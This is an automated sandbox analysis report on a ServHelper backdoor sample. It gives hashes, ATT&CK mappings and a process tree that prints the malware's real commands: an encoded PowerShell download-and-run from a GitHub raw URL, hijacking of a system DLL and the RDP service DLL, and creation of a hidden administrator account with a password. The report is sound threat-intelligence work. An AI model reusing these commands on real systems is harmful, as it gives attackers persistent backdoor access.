servhelper | 5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa

Analysis

max time kernel
138s
max time network
120s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 11:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe
Size

5.9MB
MD5

3cb66d271255d59945381fdc6fab9b91
SHA1

cba5bc5d238ffa84cadb81d8ac65c81c289ec74a
SHA256

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa
SHA512

770a6f375c8ba6c3c4a7da63652b58ccac9a3a0c005cf1cfc8db21447ae247bcc705c8f20da683ca89e1f0102604e23310be76c4c5daf358f81d2b36008c9a75
SSDEEP

49152:ZvAR1erb/TkvO90dL3BmAFd4A64nsfJibC5IaYNPk6bs3xwXmUGzDrQMHLPSZaaH:ZvQpbwmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 2496 powershell.exe
8 2496 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2256 icacls.exe
1968 icacls.exe
2300 icacls.exe
1556 takeown.exe
2244 icacls.exe
2116 icacls.exe
1752 icacls.exe
2120 icacls.exe

flow	pid	process
7	2496	powershell.exe
8	2496	powershell.exe

pid	process
2256	icacls.exe
1968	icacls.exe
2300	icacls.exe
1556	takeown.exe
2244	icacls.exe
2116	icacls.exe
1752	icacls.exe
2120	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

652
652
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2300 icacls.exe
1556 takeown.exe
2244 icacls.exe
2116 icacls.exe
1752 icacls.exe
2120 icacls.exe
2256 icacls.exe
1968 icacls.exe

pid	process
652
652

pid	process
2300	icacls.exe
1556	takeown.exe
2244	icacls.exe
2116	icacls.exe
1752	icacls.exe
2120	icacls.exe
2256	icacls.exe
1968	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 raw.githubusercontent.com
7 raw.githubusercontent.com
8 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U2TWIII9G23PO385T2QK.temp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2604 WMIC.exe

pid	process
2604	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20cd736e378bda01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2832 reg.exe
Runs net.exe

pid	process
2832	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2612	powershell.exe
2688	powershell.exe
2320	powershell.exe
1992	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
2496	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid process

480
652
652
652
652
652

pid	process
480
652
652
652
652
652

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2868	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeRestorePrivilege	2116	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2604	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2604	WMIC.exe
Token: SeAuditPrivilege	2604	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2604	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2604	WMIC.exe
Token: SeAuditPrivilege	2604	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2668	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2668	WMIC.exe
Token: SeAuditPrivilege	2668	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2668	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2668	WMIC.exe
Token: SeAuditPrivilege	2668	WMIC.exe
Token: SeDebugPrivilege	2496	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2868 wrote to memory of 2612	2868	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe	powershell.exe
PID 2868 wrote to memory of 2612	2868	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe	powershell.exe
PID 2868 wrote to memory of 2612	2868	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe	powershell.exe
PID 2612 wrote to memory of 2572	2612	powershell.exe	csc.exe
PID 2612 wrote to memory of 2572	2612	powershell.exe	csc.exe
PID 2612 wrote to memory of 2572	2612	powershell.exe	csc.exe
PID 2572 wrote to memory of 2700	2572	csc.exe	cvtres.exe
PID 2572 wrote to memory of 2700	2572	csc.exe	cvtres.exe
PID 2572 wrote to memory of 2700	2572	csc.exe	cvtres.exe
PID 2612 wrote to memory of 2688	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 2688	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 2688	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 2320	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 2320	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 2320	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 1992	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 1992	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 1992	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 1556	2612	powershell.exe	takeown.exe
PID 2612 wrote to memory of 1556	2612	powershell.exe	takeown.exe
PID 2612 wrote to memory of 1556	2612	powershell.exe	takeown.exe
PID 2612 wrote to memory of 2244	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2244	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2244	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2116	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2116	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2116	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1752	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1752	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1752	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2120	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2120	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2120	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2256	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2256	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2256	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1968	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1968	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1968	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2300	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2300	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 2300	2612	powershell.exe	icacls.exe
PID 2612 wrote to memory of 1392	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 1392	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 1392	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2832	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2832	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2832	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2828	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2828	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2828	2612	powershell.exe	reg.exe
PID 2612 wrote to memory of 2260	2612	powershell.exe	net.exe
PID 2612 wrote to memory of 2260	2612	powershell.exe	net.exe
PID 2612 wrote to memory of 2260	2612	powershell.exe	net.exe
PID 2260 wrote to memory of 2292	2260	net.exe	net1.exe
PID 2260 wrote to memory of 2292	2260	net.exe	net1.exe
PID 2260 wrote to memory of 2292	2260	net.exe	net1.exe
PID 2612 wrote to memory of 1492	2612	powershell.exe	cmd.exe
PID 2612 wrote to memory of 1492	2612	powershell.exe	cmd.exe
PID 2612 wrote to memory of 1492	2612	powershell.exe	cmd.exe
PID 1492 wrote to memory of 592	1492	cmd.exe	cmd.exe
PID 1492 wrote to memory of 592	1492	cmd.exe	cmd.exe
PID 1492 wrote to memory of 592	1492	cmd.exe	cmd.exe
PID 592 wrote to memory of 548	592	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe
"C:\Users\Admin\AppData\Local\Temp\5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nr3jwjjc.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12C7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC12C6.tmp"
4⤵
PID:2700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1556

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2244

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1752

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2120

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2256

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1968

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2300

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1392

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2832

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2828

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2292

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1116

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:1648

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:2404

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:1804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:984

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1256

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2000

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:2552

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:2424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:2028

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 90eOskma /add
1⤵
PID:1544

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 90eOskma /add
2⤵
PID:1192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 90eOskma /add
3⤵
PID:2952

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1672

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:1356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:1616

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD
1⤵
PID:3068

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD
2⤵
PID:1860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD
3⤵
PID:1664

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1148

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:2992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:1700

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 90eOskma
1⤵
PID:1688

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 90eOskma
2⤵
PID:836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 90eOskma
3⤵
PID:1588

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2408

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2800

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2616

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES12C7.tmp
Filesize
1KB

MD5
d90695d2734db2bb48863c766f94dbb6

SHA1
95d519c5aa631079d9c19012ff699e3709ac2ec5

SHA256
20467d6b5c9b47cbd85aef644ae42e6b28f078051b0a0f159fb9e7fe9202649d

SHA512
90f69016f546a4917f74d00613cc3fd6ae1058e673de92b71478a144da23dab2d2ba6a3039917d685d3dca30c44f2046d4f055b1bd75d13fc8d09c0ce82325b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nr3jwjjc.dll
Filesize
3KB

MD5
9f32332ce65dac7477e6e8e16f02dd57

SHA1
45f9bae12f31e7bc567c6a1eddab71574c68f8d8

SHA256
2fb812405a959ce722d9bb521d3cb2f4dc0523e1e2544489cbe27360be54f2d8

SHA512
9b8d305ecc1c8c81f406ea52c947d6cba52fe6d423a07a39eda07feab0e30471c80cb60ec9ac533b9952ef77148c3eecde306492d31ef4e0cbc82f4879ad1110

Download Submit
C:\Users\Admin\AppData\Local\Temp\nr3jwjjc.pdb
Filesize
7KB

MD5
8a8937b6e9445827505045911b546c46

SHA1
e1ffd40512bce884ccddbf088e21d99efc49d333

SHA256
fde404707a61a54714530faed98376b00ca924f40c36b3c3da17efcb6a64e8a6

SHA512
9954fc91a9df1b005fa63cf8316407387edc6d187d467043446b3f8eb7b8601b917a590b579c0ca23e9448c98f7370ac18d17317719af7692e6f3b27eac90af9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
Filesize
2.5MB

MD5
b898b51a4248bca6b7845652bdc104c4

SHA1
7f8b2d9b32ac9cff983a7f9f88daf741db5bfb27

SHA256
156c6af2b92ae424573f6965b20b666ba26a9863e96aa2a799c32e386e9eb037

SHA512
119b7eefa328e50325511090fbcb5ea1b41b74be6e11fd6e87339eea6f2a454715afa21920bd91e176019e19f0a8899406f52edbc6099eed394d466b85870031

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b61c7dc5dda85e82c8bebcdb6389cdc2

SHA1
4c29cd510d98d4d39e447eb26b115e260c00e81a

SHA256
053a8bf42cba4a890299905d61a84126952abdbc5975ba6e8b1650424f18f7bc

SHA512
64d63c052bdfbc7c393212108d9cfc04f485c4d8ca25d9f131d5c1c8880b6b8a45b60be59c072c9d630ea21cac9f5778a6c9e90a2d95938beae35bb80814aaed

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC12C6.tmp
Filesize
652B

MD5
cb1b4ee0da1d19a1582a2d23fd8e6a8a

SHA1
86aa6eab657d777d496a21b5a3a8e062df876c34

SHA256
152472cbde7e22787b43d75dd99fe9ec45bdce91b49174e0430fcc40074df2f0

SHA512
2e305afd096d15e58097e1df052f0388048469b43a52a49e854685f6fc1213e0acaef9bfff08808a544e3211984a9a59d310a09725fdc1bf0e98ee37c10a62be

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nr3jwjjc.0.cs
Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nr3jwjjc.cmdline
Filesize
309B

MD5
95c9f65db7009a58d64b5022ca565141

SHA1
23f8527611824cad844ce7e4ffe8cd23cb6f6ea0

SHA256
2c9e15f4c0d5b2b047d995098cc77d0d0a038ece2093f79485909778965fe3cb

SHA512
5cb59aa36f6e907b67e483870256f3adde98cb859fdaab83f771b83e36c11cdadc01ee050d16a1fd3e595facab3d1b0549357e801ccf92b9c99f9085233c5e92

Download Submit
\Windows\Branding\mediasrv.png
Filesize
60KB

MD5
b7df367405df1d63dd0b77952f864d39

SHA1
0a4ead8259be4064ee7403833749bcb5a7464d72

SHA256
57214113a306cb06d2f41b4092c0c0ad3945ee7f5a8cc9381cfb4ba9ac2d8fc6

SHA512
8f2edf67b7d832255c41db8169b0e26b91e0082fbd1be68d3ee090067071bd7003605fb4aed450c9507541f0c39312c5bba6998320a26423354217d90d5408f4

Download Submit
\Windows\Branding\mediasvc.png
Filesize
743KB

MD5
5cfa3b3e19ba458fc1459abd524532fd

SHA1
24b8d9f57c1a10b58b6962dcfc21405a6fd0b756

SHA256
b5e776f84f8f01fcc1fb822ff5612afe62097bf367ced2187fda0b5bf3d652ee

SHA512
